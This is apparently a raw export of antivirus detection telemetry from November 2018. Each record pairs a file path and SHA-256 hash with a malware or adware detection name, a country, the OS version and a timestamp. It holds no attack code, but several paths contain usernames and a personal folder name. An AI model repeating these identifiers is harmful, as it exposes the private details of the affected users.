  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T23:22:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a182_calc.exe', filepath='c:\\program files\\ansys inc\\a182_calc.exe', filesize=768000, name='HEUR/APC.#M1.#R1'), hash='14b7bae82b46bf77ea72bf863cc4a9a8dca99883fbb31e7de8c66604e371ff09', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3903784, timestamp='2018-11-04T14:57:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsr42A2.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T14:46:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ilttrptc.exe', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\lvljrgea\\ilttrptc.exe', filesize=15232000, name='TR/Crypt.XPACK.iypne.#M1.#R1'), hash='40234587da856a9a760f4ff824c17eb1da20ee23d69200da8a3b489a39d0ae72', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T06:01:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:50:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:43:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='coreldraw graphics suite x7 17.1.0.572 multilingual.(incomplete).rar', filepath='\\\\?\\C:\\Users\\X\\Documents\\Usenet.nl\\Virus_X7 Graphics Suite Coreldraw Corel (2014) Build Corelcad - x86x64\\Coreldraw Graphics Suite X7 17.1.0.572 Multilingual.(incomplete).rar', filesize=2304000, name='TR/Dropper.MSIL.Gen4.#M300.#R301027'), hash='d37221f54d8a3810d692d258c930b165b70b41d10cba134b1217b659479c14f7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:18:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00008e3b', filepath='C:\\Windows\\Temp\\d9e6d037-1454-4f52-9896-6d70fa38db9d\\tmp00000381\\tmp00008e3b', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='550a1e283f1737e8073662abcbcf73d5ff5e484f81925b24e576b8129b4200e5', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.930.11587\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-04T11:04:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cpu_id.exe', filepath='e:\\asus2017kasımyedeği\\temmuz2017\\sontopluuu\\yeni klasör (2)\\masaustu\\mathcad14\\mathcad\\program files\\mathcad\\mathcad 14\\cpu_id.exe', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='ad66738b1ae36680beb447e692d641671d2fb2d77976998fe2471d8a0473739b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:44:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:04:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sbeagentupgrader.exe', filepath='C:\\ProgramData\\VIPRE Business Agent\\Downloads\\SBEAgentUpgrader.exe', filesize=480000, name='TR/Crypt.XPACK.Gen7.#M300.#R604486'), hash='9d474e14281cc8d51b8c02cf81a14415f94770561036fe42db4bf164613d9714', metadata=Row(cmdline=None, country='GD', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\VIPRE Business Agent\\SBAMSvc.exe', parentsize=6787480, timestamp='2018-11-04T06:08:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gfactorydownload.exe', filepath='D:\\All Flash Tool\\SPD_Upgrade_Tool\\Factory-Upgrade-Research-R4.0.0001\\FACTORYDOWNLOAD_R4.0.0001\\Bin\\gFactoryDownload.exe', filesize=1856000, name='W32/Ramnit.CD.#M1.#R1'), hash='abfd601e1a8477ff116c00e4de9138b02c2a2901153301062d06e458e3375392', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\baidu\\Baidu Browser\\spark.exe', parentsize=983056, timestamp='2018-11-04T12:08:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:50:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T19:43:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='regsvr32.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\아빠보험청구\\이중훈 영상CD\\Viewer\\ATL\\Regsvr32.exe', filesize=64000, name='TR/Patched.Gen.#M300.#R3369'), hash='47d2a52b49b64e35553fe4e302d5307e13f0e4be3bd287859cd7896f09cc21af', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:50:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T05:24:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autokms.exe', filepath='C:\\Windows\\AutoKMS\\AutoKMS.exe', filesize=1856000, name='TR/Rogue.KDV.795271.1.#M1.#R1'), hash='ec418843efb4baeac8d80b9df6901e4860efda54941b64e346f97f9fde3a8994', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\AutoKMS\\AutoKMS.exe', parentsize=1856000, timestamp='2018-11-02T08:04:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-021854-52721e8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47371313\\AVSCAN-20181103-021459-38783B30\\AVSCAN-20181103-021854-52721E8F', filesize=92000, name='HEUR/AGEN.1007429.#M1.#R1'), hash='e75837394b3dfb3f3f727d13f77948e0d27fc9e621242ea910b518b2561ae517', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T23:19:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\Program Files\\Avira\\AntiVir Desktop\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='a439b92467f19dafed9fcf6b5490215b3bcd9d3c3d2b25bd9943b64311c56d64', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T01:09:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qdcgdfps.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\QDCgdFPs.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:09:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='szhhqijrgsw.exe', filepath='c:\\users\\X\\appdata\\roaming\\szhhqijrgsw.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T16:30:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:11:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8b1882f1d739458565cf015d0dc28751bce40663366ef316d8abacbcd74939cc', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8B1882F1D739458565CF015D0DC28751BCE40663366EF316D8ABACBCD74939CC', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8b1882f1d739458565cf015d0dc28751bce40663366ef316d8abacbcd74939cc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:22:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150901-1aaa62eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_535b8b26\\AVSCAN-20181102-132126-77956AC9\\AVSCAN-20181102-150901-1AAA62EB', filesize=128000, name='TR/AD.MoksSteal.B.#M1.#R1'), hash='da8af2c922f3eb12609cb5588a0d5bd5e0806f91f26efb356fcc8be4f1623c1e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:39:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ldxewd[1].bmp', filepath='\\?\\C:\\Documents and Settings\\X\\Local Settings\\Temporary Internet Files\\Content.IE5\\S31YTB02\\ldxewd[1].bmp', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='chohfoiyflb.exe', filepath='c:\\users\\X\\appdata\\roaming\\chohfoiyflb.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T14:26:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='18', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T15:34:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Users\\olli\\AppData\\Local\\LPT\\Smartbar.Communication.dll.vir', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9600a7a82fa27381b6c5a23c81326e60b1b30a39d0b20feb6a066b67ef1ea05e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:27:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsz83F0.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-02T07:32:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='magicobj.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MAGICOBJ\\MAGICOBJ.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='e82b3935870df0344fbde79f0ab41a998ccb9c9cace45fd749bac407960e27e4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='v_mzo8.x64.dll', filepath='\\\\?\\C:\\ProgramData\\DiscountExtensi\\V_MZo8.x64.dll', filesize=512000, name='ADWARE/Adware.Gen.#M300.#R5604'), hash='a1e97e0095bd869fcee2bd9914dabd68579476d2e946615e2169c3e49c5c28df', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:45:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='favorites.exe', filepath='G:\\Skypee\\Favorites.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='fee0e295820754d0be64a56d39ca0e18e346776474ef779ad5d30a979b8f38be', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T16:13:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='social media.exe', filepath='F:\\output\\social media\\social media.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:29:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{7C63A674-7475-4F34-AAD8-AB6ADBE6A158}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='cb2da8e0195615e58b563efc9de645ba81d451d481389a639afeb5dcc13bb960', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:41:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-214015-8dc0c03d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2bd5db88\\AVSCAN-20181101-213519-67EC0897\\AVSCAN-20181101-214015-8DC0C03D', filesize=896000, name='Adware/CrossRider.mrhba.#M1.#R1'), hash='b725dfdb3755335affe6ea33419d5c08308b81a1d82818623958e961c3de1254', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:40:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\4oyes3v45pp\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:18:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='giran.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Giran\\Giran.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='d6e16250c7516c45198b0f3d2029f7fb980b732cbf31efe07e449651baea9488', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061257-44ac6c0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234307-8D092D33\\AVSCAN-20181102-061257-44AC6C0C', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T03:14:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='alonso.exe', filepath='C:\\Program Files (x86)\\Deforming\\alonso.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='efbb5dc8bb09c6875770d4b43e51aeb97a5b6ff29d81333e8266736432b4b95a', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-02T00:47:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='oem8.exe', filepath='\\\\?\\C:\\windows\\OEM8\\OEM8.exe', filesize=1216000, name='TR/Agent.eicik.#M1.#R1'), hash='a376a3e58f33d52aae11c8f8e95b0750222d219caf425e0f2aa96a68102b75c8', metadata=Row(cmdline=None, country='A1', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:45:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='music.scr', filepath='C:\\Users\\X\\Music\\Sample Music\\Music.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='c4c2f4ef16473557538410aa8c176d66062d871792759f4ccd832972eb8586f8', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-02T05:46:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='teracopydisable.exe', filepath='E:\\HBCD\\Programs\\TeraCopyDisable.exe', filesize=64000, name='TR/Siggen.64000.#M1.#R1'), hash='b6818febad1804ad62284091c33fe091df1ac21054495fd682540108b7386041', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3274020001.scr', filepath='F:\\scan-peta-wb-sp2010\\3274020WB\\3274020001\\3274020001.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T04:04:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloader-fuer-nero_burnlite-10.0.10600.exe', filepath='\\\\SERVER\\Zebzda\\Download\\downloader-fuer-nero_burnlite-10.0.10600.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='ca1bd75f0e3ccf666ca718880e6866dcd54ee8b3e832d962f7e6c894994e1b7b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T08:41:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082832-95d04474', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-082615-784E182D\\AVSCAN-20181102-082832-95D04474', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:31:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f0a1e4268e7c9b23965776c74e1128ab68a5bd3a17084034255a67061438d61f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F0A1E4268E7C9B23965776C74E1128AB68A5BD3A17084034255A67061438D61F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f0a1e4268e7c9b23965776c74e1128ab68a5bd3a17084034255a67061438d61f', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:14:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210037-5d7a48e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb77e4c9\\AVSCAN-20181104-210000-5960DD46\\AVSCAN-20181104-210037-5D7A48E7', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='cac04bd9f620e52722910d4cb065245cdd766dce4430e4ccaf0691bc35bab5bf', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:00:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl174.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl174.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jpsyyrym.exe', filepath='I:\\RECYCLER_DETEC (3)\\S-8-6-40-0336675170-6116534571-118242658-3858\\jpSyyrYm.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='c6fc50ef3f9b385470e04b02fd9c605618a55c98414df30ca441da2f2948969b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T14:51:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185502-02593dd3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-185502-02593DD3', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:55:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-191251-935f1574', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1065741a\\AVSCAN-20181104-190059-409DD963\\AVSCAN-20181104-191251-935F1574', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:11:18Z'), dt=datetime.date(2018, 11, 4)),
